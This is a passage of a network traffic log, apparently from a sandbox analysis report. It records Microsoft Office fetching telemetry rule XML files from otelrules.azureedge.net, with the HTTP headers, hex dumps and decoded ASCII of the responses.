                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          103192.168.2.45738213.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:00 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:00 UTC470INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:00 GMT
                                          Content-Type: text/xml
                                          Content-Length: 501
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                          ETag: "0x8DC582BACFDAACD"
                                          x-ms-request-id: 485a87fa-401e-0029-449d-379b43000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224500Z-164f84587bffvwt9hC1DFW2ktw000000044000000000tev4
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:00 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          104192.168.2.45738313.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:00 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:00 UTC515INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:00 GMT
                                          Content-Type: text/xml
                                          Content-Length: 2592
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                          ETag: "0x8DC582BB5B890DB"
                                          x-ms-request-id: b7727e70-701e-005c-5ef2-39bb94000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224500Z-r18f44ddb69clgzfhC1DFWcnwc00000000g000000000cmqa
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          X-Cache-Info: L1_T2
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:00 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          105192.168.2.45738413.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:00 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:00 UTC515INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:00 GMT
                                          Content-Type: text/xml
                                          Content-Length: 3342
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                          ETag: "0x8DC582B927E47E9"
                                          x-ms-request-id: 152871bd-d01e-002b-2382-3725fb000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224500Z-16547b76f7fljddfhC1DFWeqbs00000007a0000000009g6s
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:00 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          106192.168.2.45738513.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:00 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:00 UTC515INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:00 GMT
                                          Content-Type: text/xml
                                          Content-Length: 2284
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                          ETag: "0x8DC582BCD58BEEE"
                                          x-ms-request-id: dd43ea10-201e-0003-39d2-37f85a000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224500Z-16547b76f7fbkfmzhC1DFWm9tw000000060000000000txqq
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:00 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          107192.168.2.45738613.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:00 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:00 UTC515INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:00 GMT
                                          Content-Type: text/xml
                                          Content-Length: 1393
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                          ETag: "0x8DC582BE3E55B6E"
                                          x-ms-request-id: 1c255c34-701e-0053-4dbc-373a0a000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224500Z-16547b76f7fkf5v9hC1DFW2y5s00000006bg000000008yp1
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:00 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          108192.168.2.45738713.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:01 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:01 UTC515INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:01 GMT
                                          Content-Type: text/xml
                                          Content-Length: 1356
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                          ETag: "0x8DC582BDC681E17"
                                          x-ms-request-id: 49ec1b40-d01e-00ad-43af-36e942000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224501Z-16547b76f7fw2955hC1DFWsptc00000006u0000000012err
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:01 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          109192.168.2.45738813.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:01 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:01 UTC515INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:01 GMT
                                          Content-Type: text/xml
                                          Content-Length: 1393
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                          ETag: "0x8DC582BE39DFC9B"
                                          x-ms-request-id: 66d79bbb-701e-006f-4ab4-39afc4000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224501Z-16547b76f7fwcwmrhC1DFWtp040000000260000000013znb
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          X-Cache-Info: L1_T2
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:01 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          110192.168.2.45738913.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:01 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:01 UTC494INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:01 GMT
                                          Content-Type: text/xml
                                          Content-Length: 1356
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                          ETag: "0x8DC582BDF66E42D"
                                          x-ms-request-id: cd078e55-e01e-0020-52a2-37de90000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224501Z-164f84587bfm8kdnhC1DFWey4g00000006n0000000009z3k
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:01 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          111192.168.2.45739113.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:01 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:01 UTC515INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:01 GMT
                                          Content-Type: text/xml
                                          Content-Length: 1358
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                          ETag: "0x8DC582BE6431446"
                                          x-ms-request-id: 21ae6e2f-801e-008f-20af-362c5d000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224501Z-16547b76f7fqqjnnhC1DFWxv7400000004ng00000000yqdh
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:01 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          112192.168.2.45739013.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:01 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:01 UTC515INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:01 GMT
                                          Content-Type: text/xml
                                          Content-Length: 1395
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                          ETag: "0x8DC582BE017CAD3"
                                          x-ms-request-id: 9d36fa3e-201e-00aa-2ec7-373928000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224501Z-17cf5b775c482xjhhC1DFWhqac00000000h0000000002wxe
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          X-Cache-Info: L1_T2
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:01 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          113192.168.2.45739213.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:02 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:02 UTC515INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:02 GMT
                                          Content-Type: text/xml
                                          Content-Length: 1395
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                          ETag: "0x8DC582BDE12A98D"
                                          x-ms-request-id: 6763c5ef-a01e-000d-6fc4-37d1ea000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224502Z-16547b76f7f64d6whC1DFWf9vn00000005200000000090e1
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:02 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          114192.168.2.45739313.107.246.45443
                                          TimestampBytes transferredDirectionData
